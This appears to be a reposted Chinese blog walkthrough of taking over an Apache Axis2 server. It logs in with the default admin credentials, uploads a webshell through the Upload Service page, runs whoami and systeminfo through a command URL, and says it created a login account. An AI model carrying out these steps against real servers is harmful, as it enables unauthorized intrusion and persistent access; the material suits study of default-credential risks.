AXIS2 弱口令提权
2019-11-18 11:36:35 Author: mp.weixin.qq.com(查看原文) 阅读量:99 收藏

AXIS2 弱口令  账号admin   默认密码:

axis2http://127.0.0.1:8080/axis2/axis2-admin

登录进去点击第一行 Tools下的Upload Service 

上传大马

上传成功后

http://127.0.0.1:8080/axis2/services/Cat/exec?cmd=whoami [whoami 查看权限]

 

administrator  管理员权限   看到这我们知道了 这是太win 的机器 
输入:
systeminfo   看下系统信息

windows 2008的   还能看到其他一些信息  ()
创建个帐号 

   

创建成功 嘿嘿 登录机器  

 

 结束嘿嘿


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650458044&idx=3&sn=52f4a8cef1f28381db72fd2fae1334ff&chksm=83bba258b4cc2b4edc8d788fced0d287214a28ded33af0688d37b27cde727d6bc36db4a1fdfd#rd
如有侵权请联系:admin#unsafe.sh